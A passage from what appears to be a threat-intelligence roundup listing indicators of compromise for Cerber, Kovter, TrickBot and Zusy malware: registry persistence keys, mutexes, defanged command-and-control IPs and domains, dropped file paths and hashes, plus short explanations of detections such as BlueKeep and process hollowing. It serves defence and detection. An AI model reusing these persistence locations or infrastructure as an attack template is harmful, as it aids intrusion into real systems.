10090eb3748f2ef4a3410b978df0dec22a0ca628beeaa090831617fb997526cb 3eb86dad7bb8868860f384dd24d16549667ce5b061b58cac1d347d91bc570c8f 44d6e2ae47ae32f07c538f8ddfccc317f75473292ab3b6c83a5ae89d57331917 4c4f1c451117fcf06c6c58ff1db2146cddac669c7c986056d3a544bc639bc81b 551f4de8915c4f2cacf24a47a6f2a8abf04d3013f6d1dcac046b4cd08a316511 5a088eff9314d8fa8c0c3bcde24054159770727d2df8bfd60fc514e14845e60d 8100dadd48d770942ab9ff1fe2e6c07693173d96300d2562703739948239294e 85ca5679a5ca406211e22f5f51498814b632b21bd72de5259eced8b95d981c86 8c8f0914a29cfe562457968af091c6b8696782b86fda717165e8ddca2ac35b83 a12c5d5090f35f8a9aedf9f159469e45a34d76fda6369a7116ca0d6fbc1abfe9 b78ebf81a32e57b134f39555a748823641723d6f42c7878a8115bc6f1363aa31 be31cb2aaaa019e1d3726f8c23705ccef08c64e674a4ff768f5fdc7fbc2f26bb c0d07e09a2d35bcc63135595f0b5065e78adf3c292257e71a034348dd0d21123 cc440bfe8b21e8e03566e43eda8fbf78d5c1194dc9ae8d7228624bc1c17949af dd7089ce8745289e0962fea5c8001c7e0bcb73921c25710a3730ed4fc0d8d8c7 f977796809ac7f7babc3b7e44b84b348bb4965f9d3a4b43a6ea81c3b38ab9101 fcd3bc1ab5b4c663c0365471e09685e01160e1f614423a2c6bafbc89e3dac392

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Ransomware.Cerber-7571364-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER
Value Name: EnabledV8
36
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER
Value Name: EnabledV9
36
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ozilixas
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: uzurnpuj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: esalaluj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: agovoryb
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ozekyzhf
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109A10090400000000000F01FEC
Value Name: OutlookMAPI2Intl_1033
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ixilxvuv
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: yxazigov
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ewetesyl
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: abizynyw
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: amjsegsd
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iqapasjj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: jliwywoc
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: enowivic
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: isydipfb
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: elulyzod
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: yhyhohux
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ewpbizyd
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: orebujyj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ojofukax
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: yrunyfeb
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: esfdozih
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: uqihevur
1
MutexesOccurrences
Global\epugepiqupupamyhatuxadu19
Global\yladonexilyjabufyfetetawinipipi19
Global\usysisexaqicuseteqisexe1
Global\ysywiqujeqikevotevasowogajirube1
Global\obegahatyqujehinunyfijewydopuva15
Global\urohamiratototacykojumi15
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
216[.]239[.]32[.]215
216[.]239[.]38[.]219
128[.]31[.]0[.]3925
216[.]239[.]36[.]217
216[.]239[.]34[.]218
86[.]59[.]21[.]3821
193[.]23[.]244[.]24410
208[.]83[.]223[.]3422
194[.]109[.]206[.]21227
154[.]35[.]32[.]525
171[.]25[.]193[.]917
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ipecho[.]net36
ikit[.]blasters[.]biz2
itud[.]jordaust[.]biz1
icev[.]blasters[.]biz1
eqak[.]blasters[.]biz1
esykowyx[.]blasters[.]biz1
ycyzacuk[.]blasters[.]biz1
imivutymucu[.]blasters[.]biz1
akiso[.]blasters[.]biz1
overypubu[.]blasters[.]biz1
yxaratdti[.]blasters[.]biz1
iraqrlan[.]blasters[.]biz1
ymex[.]blasters[.]biz1
ajevareda[.]blasters[.]biz1
ytosonyg[.]blasters[.]biz1
inuxaqwken[.]blasters[.]biz1
ydufujkse[.]blasters[.]biz1
oxunynaduba[.]blasters[.]biz1
ogylipympvy[.]blasters[.]biz1
ikawysal[.]blasters[.]biz1
asasexstab[.]blasters[.]biz1
yslx[.]blasters[.]biz1
ipel[.]blasters[.]biz1
axsrf[.]blasters[.]biz1
ixetehac[.]blasters[.]biz1
*See JSON for more IOCs
Files and or directories createdOccurrences
%ProgramData%\igudikadilejogic\0000000020
%ProgramData%\igudikadilejogic\0100000020
%ProgramData%\igudikadilejogic\0200000020
%ProgramData%\igudikadilejogic20
%ProgramData%\owegidamivejedir1
%ProgramData%\owegidamivejedir\otopevic1
%ProgramData%\owegidamivejedir\acopaqic1
%ProgramData%\owegidamivejedir\ykopapic1
%ProgramData%\uciqelufyjyryluj15
%ProgramData%\uciqelufyjyryluj\emugavat15
%ProgramData%\uciqelufyjyryluj\atugolat15
%ProgramData%\uciqelufyjyryluj\ifugupat15
%SystemRoot%\<random, matching [a-z]{8}>.exe36

File Hashes

01966d2f6ffc32e55ae9cf61192b45d79c9dea2f83223c1ed91fac631408f82a 0d7ca73038b630871bf332e06fa6efcdd8be9bd78fa9be3d09561eb25ab13970 15cfebd8e3941b8079a277535c7cd7487e10d0e5068a7c14d9e2a3056408f419 1ae503736b88bac3f50e9b537483c77cfe320ff6af1164c330b6c2647a480703 1d140e68d59e321066c64b4b8aa17ba676bfaf0e27a658e33f6d20b1c14d7e15 21fa344b6cbba9265353a5b9d1581a377c93e3896d1bd958ba2afb3c292bd168 24836009269f540fde8aa4d74b967a22c390042a30a76a124614ea8e2689ab8d 2bc36dd8f4c9207dcd4e66f8355adaa9fdf9037a0b6b7905512430d46e721947 2d08575cc2db1913c3ca603d3e528ccca990ebde7282d2e259ab85d7c51346b2 3275ad7d7eca08eb0e7109ba1eae744ad07b934e2c35b222bf4f4cfd1601cc29 35bc364d8460264beaaf89237901a720b546fec6a22cbeb166c4e49db6b6e44a 3d197b4896788463b4ce031cc6bb2c5f5ec3b987ee4e83f205cafbcaab384149 3ed3efa6bfc3da524a75013b03985098309ff8871d87e50a6c9b5cad50a7a115 45fa0f900980addac5bf4a528c805355ec8f3edebdf4f36d74d6498beb2f9e90 4794db3d19d99b81c31ab65b06568dc782b52ff80e6aa55a351a89613c3db86f 4ae3784d564c4558e3ea99b80cea23a8373d5f3ada449de72c08b2e95835868b 50d2e30bd801d5bd806d9c85abff75614d9d8d592b322d8fe5f9df2455bc5b0b 53d3e642d001fb563a21b0f0a28748d6ae26ad59b100ee1ba8cf10ec9e390f1c 55124c96c858d5c8ce6d233487a8aa26e8138f7871033e679c59c1dc114d1eb9 58866f02555d41c0a8299275ca036fe7c47553a6615e955e935675e53b0f49af 59c1ad24e09414391265b638fa32b743cf3e2097013eead30e47db9e02f3fbc2 5dc00ea3e7d3b2b9a239ba77525cbf6dc5ecebd1f9d97c25f884dabf043c5134 5ff54a15b800aba735883b03ab68cede13dc0bfbfcc56501d9ac26e9f4d1275c 610027ff0e1826f4af1539ae7142cdb355f255a8e27b0705cbb4e96f3e727613 7305660e95ca3fdcce3b8be49e6d8a6c9f61aa1162ce4b77c1cd06e2fbad6b71
*See JSON for more IOCs

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Malware.Kovter-7571676-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 656f27d6
25
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 656f27d6
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 25
<HKCU>\SOFTWARE\3A91C13AB1 25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE 25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 01b2a448
21
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 01b2a448
21
<HKLM>\SOFTWARE\WOW6432NODE\K6TWCT
Value Name: 6wRxA9ZQL
1
<HKLM>\SOFTWARE\WOW6432NODE\K6TWCT
Value Name: cBr568g
1
<HKCR>\RAVIGL4M 1
<HKCR>\RAVIGL4M\SHELL 1
<HKCR>\RAVIGL4M\SHELL\OPEN 1
<HKCR>\RAVIGL4M\SHELL\OPEN\COMMAND 1
<HKCR>\.W5PHE 1
<HKLM>\SOFTWARE\WOW6432NODE\7OGGSL
Value Name: itYx4Vw
1
<HKCR>\LH8Y07\SHELL\OPEN\COMMAND 1
<HKLM>\SOFTWARE\WOW6432NODE\7OGGSL
Value Name: 4mXmspx53
1
<HKCR>\.JG2BV 1
<HKLM>\SOFTWARE\WOW6432NODE\6381BA49F616F0D299E6 1
<HKLM>\SOFTWARE\WOW6432NODE\GQSXMYCRDP 1
<HKLM>\SOFTWARE\WOW6432NODE\6381BA49F616F0D299E6
Value Name: 013E202B8A3B2DA1
1
MutexesOccurrences
B3E8F6F86CDD9D8B25
A83BAA13F950654C25
EA4EC370D1E573DA25
Global\7A7146875A8CDE1E25
Global\ServicePackOrHotfix4
16194C57FC116A4A1
Global\C50FA8B86824EC181
9A64C6027FF2B7291
871D8E9395649C201
Global\FA5C6929342EC8E31
4BAFA1398EB6B2471
D12FD5C5B231ABC91
BBBF5BD15C2A2B8B1
Global\704022EE540B2F4C1
67B0ADCC98BB66181
53DF59FF587E423B1
Global\8F98C5D480837CFA1
Global\DA02B03F2C04CB991
170B5BC07C6A1E731
E5F0E11301A9BCDE1
Global\6B1242F27DA8C7C41
6154888E137CF66E1
1744E94C489AE9C91
Global\3535E8BAFCF21A1D1
7EB500E221ADC4FC1
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
23[.]10[.]193[.]2336
23[.]10[.]207[.]1837
173[.]201[.]146[.]1287
104[.]43[.]195[.]2513
104[.]40[.]211[.]352
54[.]54[.]193[.]1281
115[.]76[.]165[.]1271
204[.]15[.]35[.]1821
189[.]113[.]72[.]331
70[.]178[.]183[.]1281
113[.]181[.]187[.]2271
106[.]106[.]188[.]1601
36[.]207[.]228[.]851
117[.]116[.]105[.]1631
4[.]213[.]232[.]241
23[.]154[.]45[.]791
89[.]72[.]221[.]411
175[.]91[.]106[.]1401
195[.]107[.]81[.]2501
182[.]68[.]221[.]591
51[.]183[.]235[.]2141
205[.]182[.]45[.]2141
20[.]169[.]182[.]2151
8[.]51[.]40[.]1031
196[.]207[.]144[.]601
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
find-dentalimplants[.]com25
e10088[.]dspb[.]akamaiedge[.]net7
e3673[.]dspg[.]akamaiedge[.]net7
www[.]swsoft[.]com1
rolfrosskopf[.]de1
www[.]virtuozzo[.]com1
littleauggie[.]com1
Files and or directories createdOccurrences
%APPDATA%\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\runme.exe7
%System32%\WindowsPowerShell\v1.0\about_special_characters.help.txt (copy)4
%System32%\WindowsPowerShell\v1.0\about_split.help.txt (copy)4
%System32%\WindowsPowerShell\v1.0\about_switch.help.txt (copy)4
%System32%\WindowsPowerShell\v1.0\about_type_operators.help.txt (copy)4
%System32%\WindowsPowerShell\v1.0\about_types.ps1xml.help.txt (copy)4
%System32%\WindowsPowerShell\v1.0\about_variables.help.txt (copy)4
%System32%\WindowsPowerShell\v1.0\about_while.help.txt (copy)4
%System32%\WindowsPowerShell\v1.0\about_wildcards.help.txt (copy)4
%System32%\WindowsPowerShell\v1.0\default.help.txt (copy)4
%System32%\WindowsPowerShell\v1.0\getevent.types.ps1xml (copy)4
%System32%\WindowsPowerShell\v1.0\powershell.exe (copy)4
%System32%\WindowsPowerShell\v1.0\powershell.exe.mui (copy)4
%System32%\WindowsPowerShell\v1.0\powershell_ise.exe (copy)4
%System32%\WindowsPowerShell\v1.0\powershell_ise.resources.dll (copy)4
%System32%\WindowsPowerShell\v1.0\pspluginwkr.dll (copy)4
%System32%\WindowsPowerShell\v1.0\pwrshmsg.dll (copy)4
%System32%\WindowsPowerShell\v1.0\pwrshsip.dll (copy)4
%System32%\WindowsPowerShell\v1.0\types.ps1xml (copy)4
%System32%\WsmAuto.dll (copy)4
%System32%\WsmPty.xsl (copy)4
%System32%\WsmRes.dll (copy)4
%System32%\WsmSvc.dll (copy)4
%System32%\WsmTxt.xsl (copy)4
%System32%\WsmWmiPl.dll (copy)4
*See JSON for more IOCs

File Hashes

072035cc5fd36e5a21299e4c300311dfaed05b680f7b7e8ccb5d4212fd638712 080de2ac18189ab84019a22f5b7d5d49f087db70a4b52514961acf92ce302946 0a69ad9ef0cf4c9c908e70cc905836fb3e268f6971cc7b5f624f6fc3d895b9cf 1500979f9783b9f49dee8769874d5b23538323d2b483d9997304a619a527bae9 1fcfd76d6196ae6503fce812aff4b24fa498ee5d53090c74894881a057f05a2b 2563ce697e2da03842e74a292b82e2159ca18790e3921a9914a3383a35227fc9 2593888c917bccb77ef2b66467dce8ba0c17319a7f0e403fb5b6bff7be9f969f 262ca735f83655220d16258371d7d8ab50a84978185e7885a15d3cbc2b8c9d93 279ec147df4ab831ed8e3c9981647f21fa264544245c188d39bf3942e2907eba 2875a1bab3f9d8134995621a358fb158a1b254044177276fa6fd90e711c974b2 2bd029e950c1a626d5c979a1a1af238711da6af5cc84058ca8363ab4d5b0e9ba 2ca80804b8ec61c82e050c0eaf62166a0c313ee3adc1b28d03586a4a5227797a 2e42247fc678aa01b440958456b7f232e71775259c54bc9202b730d5a4e76bcc 2f08d47ecf5c2656ed75786d82b1d5a5388699f1533a9c8c91274dab6c085523 38c3aa03de00f8fc19121cd5ffb8fda9babecb621541d48cf4a3640e8f657e9f 3b4c1abc83f05a1a2167510a78b6e32027c69e0fca9d3dc31668b81ea9aff937 3b74d8005163c38c1c1187cc914632dda1fc530821d25839c4b41e08ee626641 3bb4032f62824b803bc6c63c0e92f7d1117699585375e879b24ed392754a1c6e 458f6e2b8a63b419b9f47ef20b1dd0e3a6652d06100c30a0f031b7e84e48e4b9 4b1977f5f8bd5108f8b30e827aea6f536417db02ba087698a44142f18c2307b0 50dfd29d9a7ca4f48e04c015b93fa05d28416fe84b9422669238e1b6089b9ca3 51df5522ddedb5bec493acc2c4ffb8642d3a9e8c6a0d7258454bf2ff8398697a 5a0ca2319596e3b4d353cc091d8d959eafae9eb0c4bf2116256e6bab2909d75e 5da7a9fd096ffe66991211b4556352e58d177e72dbe57cd84269c0bded5396ec 5ebd2eaa37527dafa68105ededbc8304472c0a25be6b7e5d606c0deab526b07c
*See JSON for more IOCs

Coverage

ProductProtection
AMP N/A
Cloudlock N/A
CWS N/A
Email Security N/A
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

ThreatGrid


Umbrella




Win.Dropper.TrickBot-7577793-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
3
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
Value Name: Blob
2
MutexesOccurrences
Global\316D1C7871E1047
Global\785161C88721044
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
216[.]239[.]32[.]214
216[.]239[.]34[.]214
176[.]58[.]123[.]253
216[.]239[.]36[.]214
216[.]239[.]38[.]213
104[.]20[.]17[.]2422
116[.]203[.]16[.]952
104[.]20[.]16[.]2422
190[.]214[.]13[.]228
181[.]113[.]28[.]1467
181[.]140[.]173[.]18624
45[.]125[.]1[.]345
52[.]206[.]178[.]11
54[.]235[.]220[.]2292
54[.]235[.]203[.]71
198[.]8[.]91[.]107
82[.]146[.]62[.]528
5[.]182[.]210[.]2466
5[.]182[.]210[.]2264
34[.]198[.]132[.]2041
51[.]89[.]115[.]1165
85[.]204[.]116[.]23710
93[.]189[.]42[.]1463
194[.]87[.]238[.]873
146[.]185[.]253[.]181
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]myexternalip[.]com2
ident[.]me3
myexternalip[.]com6
icanhazip[.]com4
ip[.]anysrc[.]net2
api[.]ip[.]sb5
ipecho[.]net4
checkip[.]amazonaws[.]com3
wtfismyip[.]com1
api[.]ipify[.]org4
ipinfo[.]io5
252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org32
Files and or directories createdOccurrences
%APPDATA%\windirect8
%APPDATA%\windirect\settings.ini8
%System32%\Tasks\Windows .Net library core39
%APPDATA%\netwinlib39
%APPDATA%\netwinlib\data39
%APPDATA%\netwinlib\settings.ini39
%SystemRoot%\Tasks\Windows .Net library core.job25
%APPDATA%\windirect\data8
%System32%\Tasks\Windows Direct core tools8
%SystemRoot%\Tasks\Windows Direct core tools.job8
%APPDATA%\netwinlib\88f4d8d02c72f50d136c15678cf3be9e.exe1
%APPDATA%\NETWINLIB\<original file name>.exe39
%APPDATA%\WINDIRECT\<original file name>.exe8

File Hashes

0a9f9afb0da70420f5b3bb0122f8a3e61cefa5e3b46ba0b22105861ccb4c4731 0bb38dd296227bd17fab03f287075d6d88979d9a7c0f2260900d6c79be113ed6 0c7358921c14cf5e27e1cc7522379f53b114ada048304389e2fcdd821437dcfa 0eefd7ae0d678d8e9426a3f2344baea842b09d9f60f23564e9ca38b36a2c7866 15a808f1d972bd04819ce062bfca15af6a3defc7434a4cd1df0d0f557f0b9244 19038675ae06629f0d1c69226d079a8bab2781c0531175e80edef91a1ce9a80d 1c8919240e4882c3bb261ebe3a58b950e155ff022816dbcb1c1647413f7ac82d 1cc919c69b243005688f45f53418b58ea990a40e8527aa273b797c58a592f6ad 228e28941d69b5f2a1dc9607e91f2313e4843fe4fe77e8d246c9121271012f19 278605aa9843e8eabd5e7cdc83de8a7eeb76c29a19bb41f88bed78f844d94425 2fea0302c8ffa171845092e26e5d22d92eacaa2f32ef8e0149c5480b39eb567b 329f07a624ed34bda1aaabe0e867016862937b6f08bcfa3ae6d2eeee266df41b 3a77c6f027d54b14417be9380c0e190302d98a437f7fde23cc878b2cf62d7832 3e37550017efa6c92c0060a8a5733f8b3d110ecee14d5f5e8be9a66d9dc09af1 43dc628e385c2b79471a052fbe8ad0a011301b5f56231c01f1a8aa0422482721 46d3e013654582412c2b81b841d0b9cb9baa049e3b8e62a447ac656173fc964a 47b5bef23c6129244b84a4774785c48daad1591d253001723279b180ec828962 54b553f3ef10badaccb9ef6dff73c4c6f29a35685694e6afa8d90643acd78791 648dd27a4affa4eb955935a1b66a72000fd2035a1c1aff4e640339534b767e00 682df81e000e3e2bfc4fbdb6b9ff7bdb6020ee6b1388ab3bc95be66bae65ae4a 6d2788dfa3f6e5a054eda08200a97664368b9874350555b65f4319088f1d2e06 7364613d95319976a837e6b5df8bbcb8a9e94125b816253ff6ab523f55c98c77 74e990e02d30c7ddfddb15d7411124e46da01d486abc0f7439559bd19e56ad12 7747552af8960acf1fc3090d1812c19dc38d8cf015846dcefd88c12dec0afc9d 7eb312b1de92aff32d189eef03650ba2b9bd710ca337bf24c2ed46dcdedcedc7
*See JSON for more IOCs

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid




Win.Packed.Zusy-7572206-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 36412
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 1
<HKCU>\SOFTWARE\ATLTLCN 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V0Y3JD1E-U88T-472J-2REI-16PSTS01I841} 1
<HKCU>\SOFTWARE\ATLTLCN
Value Name: ServerStarted
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WmiPrv
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V0Y3JD1E-U88T-472J-2REI-16PSTS01I841}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: WmiPrv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: WmiPrv
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: Load
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: Load
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Shell
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Shell
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: WmiPrv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: WmiPrv
1
<HKCU>\SOFTWARE\ATLTLCN
Value Name: InstalledServer
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: FIXMAPI 1.0 MAPI Repair Tool
1
MutexesOccurrences
XTREMEUPDATE1
10092996846
25621007966
lol6
mjwzCaJUioOZIIF2
ATLtlcn1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
40[.]90[.]247[.]2103
40[.]91[.]124[.]1112
20[.]45[.]1[.]1071
138[.]197[.]221[.]1991
192[.]40[.]57[.]1792
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]update[.]microsoft[.]com[.]nsatc[.]net6
infernushosting[.]net6
bighecks[.]org1
pen[.]is-certified[.]com1
Files and or directories createdOccurrences
%TEMP%\x.html1
%APPDATA%\Update1
%ProgramData%\Local Settings6
%ProgramData%\Local Settings\Temp6
%ProgramData%\Local Settings\Temp\msuwavie.pif1
%ProgramData%\Local Settings\Temp\msariiz.scr1
%ProgramData%\Local Settings\Temp\msvbazez.scr1
%ProgramData%\Local Settings\Temp\msvcais.com1
%APPDATA%\Update\Javaupdate.exe1
%APPDATA%\Mining1
%ProgramData%\Local Settings\Temp\msabomu.com1
%ProgramData%\Local Settings\Temp\msezizyf.exe1
%APPDATA%\Mining\coin-miner.exe1
%APPDATA%\Microsoft\Windows\ATLtlcn.cfg1
%APPDATA%\WmiPrv1
%APPDATA%\WmiPrv\WmiPrv.exe1
%APPDATA%\Microsoft\Windows\ATLtlcn.dat1
%HOMEPATH%\Music\fixmapi.exe1
%HOMEPATH%\Music\wdmaud.exe1
%TEMP%\msaaqinu.com1
%TEMP%\msitezcn.scr1
%TEMP%\msavoyauu.pif1
%HOMEPATH%\My Documents\My Music\fixmapi.exe1
%HOMEPATH%\My Documents\My Music\wdmaud.exe1
%TEMP%\msqwwu.exe1
*See JSON for more IOCs

File Hashes

18226c65547a1de83f00028171b8948b5c9fb33d194afd1f3f92fa5c90fdaf45 298b5a668c186cdf8fde2dc29e38d0921734b3322fe6191dabd79a12ce3440bd 2a57280bffa1d45f7510ed16d397f568395d057f10c8de214e590f458f465682 412316ac563c1028acf3d41652c670f29e60636198a304f5e560ac87ab7b4aaa 4a8dfad4d821e5f74b9f11ff82131fd533b14d4039ab1d52164a73fe08b5f05a 66bec557cf492d9014a3be80c31d53b29bc78e98d9485ef4f78de853e194c57b a71a598119ebb1598db7857d9619b71e21a447f5aec4de74fc112d4d09b90025 ba02e51162dd1ec07a955f706d09dcfe5a860adaae0e990fe1fc3809d28c0143 bbbfdd70c93b7728b38eb826b85c70e212d9ca355347fa61f10bc6488103f650 d499aaf6b7e484b7a5bf76df7a9fef3fc48e42a107020196b9c96e8637dab8db

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (5540)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Process hollowing detected - (252)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Gamarue malware detected - (177)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Kovter injection detected - (142)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Installcore adware detected - (103)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Excessively long PowerShell command detected - (100)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Dealply adware detected - (58)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Corebot malware detected - (15)
Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.
Trickbot malware detected - (9)
